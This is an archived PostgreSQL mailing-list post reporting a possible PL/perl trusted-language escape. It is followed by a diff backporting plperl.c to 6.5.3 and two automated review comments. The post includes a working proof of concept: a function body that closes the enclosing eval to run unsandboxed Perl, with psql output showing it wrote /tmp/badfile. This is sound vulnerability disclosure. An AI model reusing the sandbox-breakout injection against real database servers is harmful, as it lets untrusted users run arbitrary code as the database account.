possible security problem with PL/perl - Mailing list pgsql-general
From | ts |
---|---|
Subject | possible security problem with PL/perl |
Date | |
Msg-id | 200003060707.IAA23017@moulon.moulon.inra.fr |
List | pgsql-general |
I was looking at the extensions PL/Tcl and PL/perl, trying to write an extension for another language, when I found a possible problem with PL/perl.

My configuration:

 * PostgreSQL 6.5.3
 * plperl extracted from postgresql-7.0beta1.tar.gz
 * perl 5.005_03

At the end of this message is my modification to compile it under 6.5.3, if somebody wants to verify it (modification of some constants only: FUNC_MAX_ARGS, PROCOID and TYPEOID).

The README file says:

------------------------------------------------------------
-- here is one that will fail. Creating the function
-- will work, but using it will fail.
CREATE FUNCTION badfunc() RETURNS int4 AS '
    open(TEMP, ">/tmp/badfile");
    print TEMP "Gotcha!\n";
    return 1;
' LANGUAGE 'plperl';
SELECT badfunc();
------------------------------------------------------------

Here is my example:

------------------------------------------------------------
aestivum% pwd
/var/postgres/pl/plperl
aestivum% ls -alg /tmp/badfile
ls: /tmp/badfile: No such file or directory
aestivum% cat README
CREATE FUNCTION plperl_call_handler() RETURNS opaque
    AS '/var/postgres/pl/plperl/plperl.so'
    LANGUAGE 'C';

CREATE TRUSTED PROCEDURAL LANGUAGE 'plperl'
    HANDLER plperl_call_handler
    LANCOMPILER 'PL/Perl';

CREATE FUNCTION badfunc() RETURNS int4 AS '
    } ]), eval( q[ sub {
    open(TEMP, ">/tmp/badfile");
    print TEMP "Gotcha!\n";
    return 1;
' LANGUAGE 'plperl';

SELECT badfunc();
aestivum% psql toto < README
CREATE FUNCTION plperl_call_handler() RETURNS opaque
    AS '/var/postgres/pl/plperl/plperl.so'
    LANGUAGE 'C';
CREATE
CREATE TRUSTED PROCEDURAL LANGUAGE 'plperl'
    HANDLER plperl_call_handler
    LANCOMPILER 'PL/Perl';
CREATE
CREATE FUNCTION badfunc() RETURNS int4 AS '
    } ]), eval( q[ sub {
    open(TEMP, ">/tmp/badfile");
    print TEMP "Gotcha!\n";
    return 1;
' LANGUAGE 'plperl';
CREATE
SELECT badfunc();
badfunc
-------
      1
(1 row)

EOF
aestivum% ls -alg /tmp/badfile
-rw-------   1 postgres postgres        8 Mar  6 07:31 /tmp/badfile
aestivum%
aestivum% cat /tmp/badfile
Gotcha!
aestivum%
------------------------------------------------------------

There is no failure and the file is created.

Someone can verify if this problem:

 1) is real
 2) still exists in postgres 7.0beta1

Thanks,

Guy Decoux

ps: I'm not subscribed to this mailing list

------------------------------------------------------------
aestivum% diff -u plperl.c~ plperl.c --- plperl.c~ Sun Feb 20 09:00:27 2000 +++ plperl.c Mon Mar 6 07:14:39 2000 @@ -86,10 +86,10 @@ Oid result_in_elem; int result_in_len; int nargs; - FmgrInfo arg_out_func[FUNC_MAX_ARGS]; - Oid arg_out_elem[FUNC_MAX_ARGS]; - int arg_out_len[FUNC_MAX_ARGS]; - int arg_is_rel[FUNC_MAX_ARGS]; + FmgrInfo arg_out_func[MAXFMGRARGS]; + Oid arg_out_elem[MAXFMGRARGS]; + int arg_out_len[MAXFMGRARGS]; + int arg_is_rel[MAXFMGRARGS]; SV* reference; } plperl_proc_desc; @@ -490,7 +490,7 @@ /************************************************************ * Lookup the pg_proc tuple by Oid ************************************************************/ - procTup = SearchSysCacheTuple(PROCOID, + procTup = SearchSysCacheTuple(PROOID, Object IdGetDatum(proinfo->fn_oid), 0, 0, 0); if (!HeapTupleIsValid(procTup)) @@ -505,7 +505,7 @@ * Get the required information for input conversion of the * return value. ************************************************************/ - typeTup = SearchSysCacheTuple(TYPEOID, + typeTup = SearchSysCacheTuple(TYPOID, ObjectIdGetDatum (procStruct->prorettype), 0, 0, 0); if (!HeapTupleIsValid(typeTup)) @@ -535,7 +535,7 @@ proc_internal_args[0] = '\0'; for (i = 0; i < proinfo->fn_nargs; i++) { - typeTup = SearchSysCacheTuple(TYPEOID, + typeTup = SearchSysCacheTuple(TYPOID, ObjectIdGetDatum(procStr uct->proargtypes[i]), 0, 0, 0); if (!HeapTupleIsValid(typeTup)) 
@@ -720,7 +720,7 @@ /************************************************************ * Lookup the pg_proc tuple by Oid ************************************************************/ - procTup = SearchSysCacheTuple(PROCOID, + procTup = SearchSysCacheTuple(PROOID, Object IdGetDatum(proinfo->fn_oid), 0, 0, 0); if (!HeapTupleIsValid(procTup)) @@ -1041,7 +1041,7 @@ * Lookup the attribute type in the syscache * for the input function ************************************************************/ - typeTup = SearchSysCacheTuple(TYPEOID, + typeTup = SearchSysCacheTuple(TYPOID, ObjectIdGetDatum(tupdesc->attrs[attnum - 1]->a tttypid), 0, 0, 0); if (!HeapTupleIsValid(typeTup)) @@ -2058,7 +2058,7 @@ * Lookup the attribute type in the syscache * for the output function ************************************************************/ - typeTup = SearchSysCacheTuple(TYPEOID, + typeTup = SearchSysCacheTuple(TYPOID, ObjectIdGetDatum(tupdesc->att rs[i]->atttypid), 0, 0, 0); if (!HeapTupleIsValid(typeTup)) @@ -2134,7 +2134,7 @@ * Lookup the attribute type in the syscache * for the output function ************************************************************/ - typeTup = SearchSysCacheTuple(TYPEOID, + typeTup = SearchSysCacheTuple(TYPOID, ObjectIdGetDatum(tupdesc->att rs[i]->atttypid), 0, 0, 0); if (!HeapTupleIsValid(typeTup)) aestivum% ------------------------------------------------------------
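Review bot: in the plperl_proc_desc hunk (@@ -86,10), the four arg_out_* arrays are re-sized from FUNC_MAX_ARGS to MAXFMGRARGS, but nothing in the visible hunks checks the argument count against the new bound; the loop shown at @@ -535 still runs `for (i = 0; i < proinfo->fn_nargs; i++)`. If the two constants differ in value between the 7.0beta1 and 6.5.3 trees, it is worth confirming that fn_nargs can never exceed MAXFMGRARGS before these arrays are indexed, or adding an explicit check where the descriptor is filled in.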
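Review bot: the PROCOID to PROOID and TYPEOID to TYPOID substitutions are made by hand at seven SearchSysCacheTuple call sites (hunks @@ -490 through @@ -2134), so the backported file diverges from the 7.0beta1 source throughout. A small set of compatibility defines near the top of plperl.c, compiled only for the 6.5.3 build and mapping the 7.0 names (including FUNC_MAX_ARGS) onto the 6.5.3 ones, would leave the call sites identical to the 7.0beta1 file and make it easier to see that the change is limited to constant names and does not touch how the function body is evaluated.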